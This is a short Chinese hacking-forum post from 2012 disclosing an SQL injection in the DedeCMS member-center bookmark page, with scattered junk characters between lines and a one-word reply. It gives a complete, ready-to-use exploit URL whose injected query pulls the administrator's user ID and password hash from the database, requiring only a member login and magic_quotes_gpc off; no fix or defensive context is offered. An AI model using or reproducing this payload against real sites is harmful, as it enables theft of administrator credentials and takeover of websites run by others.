中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
/ I2 \4 X: x+ l1 I$ ]& x
需要magic_quotes_gpc = Off
1 y, }: E8 \0 E7 G6 F+ a& u
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
/ c5 r* n' A l- p+ q0 D: m
% k) ]4 A( B2 Z M6 L$ Q" B Q
DedeCMS会员中心书签管理SQL注射漏洞
( r# i" F7 u6 V4 i7 K; Z3 b8 |, |
成功利用该漏洞可获得管理员密码
& ]1 r* y$ _ R, R9 h- J) O; [
( z4 i+ r! K5 I# |* y
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
9 H2 |' m6 f$ O+ Q7 |
- d- T* {! R+ f% G8 `
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
( ?$ d: M+ L8 m6 T* {, ~
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2